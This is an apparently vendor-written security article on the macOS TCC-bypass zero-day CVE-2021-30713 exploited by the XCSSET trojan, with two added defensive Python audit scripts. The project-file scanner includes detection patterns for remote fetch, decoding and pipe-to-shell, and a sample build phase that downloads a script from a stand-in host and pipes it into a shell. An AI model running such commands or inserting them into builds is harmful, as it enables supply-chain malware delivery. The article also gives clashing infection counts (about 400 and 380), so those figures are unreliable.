macOS Zero-Day Exploited in Malware Attacks
A macOS zero-day was used to take unauthorized screenshots of an end user’s active session and harvest sensitive information.
macOS Vulnerability Used to Target Developers
On Monday, Apple released macOS 11.4, which included a patch for the macOS vulnerability CVE-2021-30713. This CVE was used to take unauthorized screenshots of an end user’s active session and harvest sensitive information.
Researchers at Jamf found the exploit while dissecting the XCSSET malware, which uses this vulnerability. XCSSET was first caught in the wild between June and July of last year and functions as trojan spyware. Trojans are a type of malware that masquerades as legitimate software (and generally does provide some utility to the victim) while performing a malicious action on the end user’s computer. The XCSSET trojan is purpose-built malware used to exfiltrate data and user information.
How Does the macOS Exploit Work?
CVE-2021-30713 relies on a previously unknown vulnerability in the macOS operating system. Apple requires software to pass an approval check by the end user or an administrator before it can run.
This process is called Transparency, Consent, and Control (TCC) protection. As part of the approval process, the user is shown an alert describing the types of permissions the software wants.
Below is an example of the Security & Privacy panel in macOS, where the various permission and privacy settings are configured. As shown, each application on the computer has its own permission setting for screen recording.
When CVE-2021-30713 is exploited, the trojan application does not appear in this list, nor does it prompt the end user or administrator for approval before it captures content from the end user. Instead, it silently activates and begins collecting data to report back to the orchestrators of the attack.
CVE-2021-30713 bypasses the security checks in macOS by piggybacking on the permissions of an already-approved application and masquerading as that application at execution time. Specifically, the exploit uses an AppleScript module named “screen_sim.applescript” to capture the list of currently approved screen-capturing applications.
The malware then creates an additional AppleScript, which it injects into the approved application. Using the permissions inherited from the approved application, XCSSET is able to perform restricted actions on the endpoint. The data XCSSET collects is then exfiltrated to a command-and-control server hosted by the attackers.
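The bypass described above works because screen-capture consent is recorded per application, and an injected script inherits whatever its host application was granted. The following is an added example, not code from the original article, Jamf or Syxsense: it audits which bundle identifiers hold a Screen Recording grant by reading the system TCC database, so an administrator can compare that list against an expected allowlist and spot the hosts an XCSSET-style injection could piggyback on. The database path, the `access` table column names and the meaning of `auth_value` are assumptions based on the macOS 11 layout, and the in-memory sample database is constructed for the demonstration; reading the real file requires Full Disk Access.

```python
"""Audit Screen Recording grants in a TCC database (added example).

Not code from the original article, Jamf or Syxsense. Assumptions:
  - the system TCC database is at SYSTEM_TCC_DB (macOS 11 layout);
  - its `access` table has columns service, client, client_type,
    auth_value, auth_reason and last_modified;
  - auth_value 2 means "allowed".
The sample database below is constructed so the script runs offline.
"""
import sqlite3
from typing import Dict, List, Set

SYSTEM_TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"  # assumption
SCREEN_CAPTURE_SERVICE = "kTCCServiceScreenCapture"
AUTH_ALLOWED = 2  # assumption: macOS 11 auth_value for an approved grant


def open_tcc_db(path: str = SYSTEM_TCC_DB) -> sqlite3.Connection:
    """Open the real database read-only; needs Full Disk Access on macOS."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_constructed_db() -> sqlite3.Connection:
    """Constructed stand-in for TCC.db with sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access ("
        "service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,"
        "auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL,"
        "last_modified INTEGER NOT NULL)"
    )
    rows = [
        # service, client (bundle id), client_type, auth_value, auth_reason, last_modified
        ("kTCCServiceScreenCapture", "com.example.meetingapp", 0, 2, 2, 1621900000),
        ("kTCCServiceScreenCapture", "com.example.unknownhelper", 0, 2, 2, 1621900100),
        ("kTCCServiceScreenCapture", "com.example.denied", 0, 0, 2, 1621900200),
        ("kTCCServiceMicrophone", "com.example.meetingapp", 0, 2, 2, 1621900300),
    ]
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", rows)
    return conn


def screen_capture_grants(conn: sqlite3.Connection) -> List[Dict]:
    """Return every client currently allowed to record the screen."""
    cur = conn.execute(
        "SELECT client, client_type, last_modified FROM access "
        "WHERE service = ? AND auth_value = ? ORDER BY client",
        (SCREEN_CAPTURE_SERVICE, AUTH_ALLOWED),
    )
    return [
        {"client": client, "client_type": ctype, "last_modified": modified}
        for client, ctype, modified in cur
    ]


def unexpected_grants(grants: List[Dict], allowlist: Set[str]) -> List[str]:
    """Clients holding a grant that the organisation did not expect."""
    return [g["client"] for g in grants if g["client"] not in allowlist]


if __name__ == "__main__":
    db = build_constructed_db()  # swap for open_tcc_db() on a managed Mac
    grants = screen_capture_grants(db)
    for g in grants:
        print(f"{g['client']:30} type={g['client_type']} modified={g['last_modified']}")
    for client in unexpected_grants(grants, {"com.example.meetingapp"}):
        print(f"REVIEW: unexpected Screen Recording grant for {client}")
```

On a managed Mac the allowlist would be the set of bundle identifiers the organisation actually deploys with screen-recording rights; anything else in the grant list is a candidate host for this kind of permission piggybacking and deserves a closer look at its signing identity and recent modification time.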
Further analysis by the researchers revealed that the permissions XCSSET compromises are not limited to screen capture, and that XCSSET can also infect browsers to collect sensitive information from online accounts.
The XCSSET trojan has been found using unverified Xcode plugins as its delivery vehicle and appears to be targeted at the software development industry. When an unsuspecting programmer installs an infected Xcode plugin with the XCSSET malware embedded, the malware deploys itself to the device.
During that deployment, XCSSET uses CVE-2021-30713 to bypass the TCC authorization process and enable its monitoring. Although XCSSET has only been found in Xcode plugins, the way XCSSET is architected means any maliciously modified application could be used to deploy it. It is therefore not safe to assume that the malware can only be deployed through Xcode plugins.
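Because XCSSET rides in with Xcode projects and plugins, the first thing a developer can do before building anything obtained from an untrusted source is read every Run Script build phase in its project.pbxproj. The script below is an added example, not code from the original article, Apple, Jamf or Syxsense, and it carries no XCSSET signatures: it extracts each PBXShellScriptBuildPhase from a pbxproj file and flags scripts that fetch remote content, decode blobs, pipe into a shell, or drive other applications through osascript. The flagging keywords are the author's assumptions about what deserves a human review, and the embedded project file is constructed for the demonstration.

```python
"""List and flag Run Script build phases in an Xcode project.pbxproj (added example).

Not code from the original article, Apple, Jamf or Syxsense, and not an XCSSET
signature set. The SUSPICIOUS_PATTERNS heuristics are assumptions about what a
reviewer should look at; the sample pbxproj text is constructed.
"""
import re
from typing import Dict, List

# Heuristic indicators (assumption): a build phase that fetches remote content,
# decodes blobs, pipes into a shell, evals strings or scripts other apps via
# osascript is not necessarily malicious, but a human should read it first.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "decode_blob": re.compile(r"\bbase64\b.*-[dD]\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "eval": re.compile(r"\beval\b"),
    "applescript": re.compile(r"\bosascript\b"),
}

# A build phase object: 24-hex-digit id, optional /* comment */, then a dict
# whose first key is `isa = PBXShellScriptBuildPhase;`.
PHASE_RE = re.compile(
    r"(?P<id>[0-9A-F]{24})\s*(?:/\*.*?\*/)?\s*=\s*\{\s*isa = PBXShellScriptBuildPhase;"
    r"(?P<body>.*?)\n\s*\};",
    re.DOTALL,
)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
NAME_RE = re.compile(r'name = "?([^";]+)"?;')


def _unescape(s: str) -> str:
    """Undo the escaping Xcode applies inside the shellScript string."""
    return s.replace("\\n", "\n").replace("\\t", "\t").replace('\\"', '"')


def find_script_phases(pbxproj: str) -> List[Dict]:
    """Return each shell-script build phase with its decoded script and flags."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj):
        body = m.group("body")
        script_match = SCRIPT_RE.search(body)
        name_match = NAME_RE.search(body)
        script = _unescape(script_match.group(1)) if script_match else ""
        flags = [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(script)]
        phases.append({
            "id": m.group("id"),
            "name": name_match.group(1) if name_match else "",
            "script": script,
            "flags": flags,
        })
    return phases


# Constructed sample: one ordinary lint phase and one phase that pipes a
# download straight into a shell. Real project.pbxproj files use tabs.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        A1B2C3D4E5F60718293A4B5C /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Lint";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        0F1E2D3C4B5A69788796A5B4 /* Setup */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Setup";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s https://example.invalid/setup.sh | sh\n";
        };
    };
}
'''


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for phase in find_script_phases(text):
        status = "REVIEW " + ",".join(phase["flags"]) if phase["flags"] else "ok"
        print(f"{phase['id']} {phase['name']!r}: {status}")
        for line in phase["script"].splitlines():
            print("    " + line)
```

Run it as `python audit_pbxproj.py path/to/project.pbxproj` to inspect a real project; without an argument it scans the constructed sample. A clean result only means nothing matched these heuristics, so the printed script bodies are the part worth reading.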
At the time of writing, there have been around 400 documented endpoints infected by XCSSET. While this number is small, several factors elevate the risk posed by XCSSET. First, the malware has been used to explicitly target developers, which in turn raises questions about the overall safety of the software development supply chain.
Secondly, the 380 reported devices impacted by XCSSET are just that: the reported devices. The total impact of XCSSET is still unknown, and many researchers expect it to be significantly larger. At the time of writing, one of the three command-and-control domains used by XCSSET is no longer active. The other two are set to expire later this year.
How to Resolve the Vulnerability
On Monday, Apple released macOS 11.4. This version of macOS extends the list of supported graphics cards, provides multiple feature updates, and, most critically, resolves the CVE-2021-30713 vulnerability, among others. While this update comes 9 – 10 months after the vulnerability was first weaponized, Apple provided limited protection against it as early as July 14th, 2020 (the first unverified positive report of the vulnerability was on June 13th, 2020). That protection checked Xcode projects for signatures consistent with the XCSSET malware. With the release of macOS 11.4, not only is the XCSSET malware less sticky in the macOS ecosystem, but its primary method of exploitation is now invalidated.
How Syxsense Can Help
Syxsense Secure provides an expansive vulnerability library that we scan against. All macOS devices under management with Syxsense Secure are monitored in real time for vulnerabilities just like (and including) CVE-2021-30713. If any critical vulnerability is detected, an automated notification alerts your security operations team to the threat.
Additionally, Syxsense Secure also provides integration with Apple’s update service to deliver critical updates to your Apple devices on a schedule you choose. With Syxsense Cortex (included in Syxsense Secure), vulnerability scanning, alerting, and patching can all be combined into a smart, fully automated workflow.
CVSS Score: 5.5/10
Attack Vector: Local
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope (Jump Point): No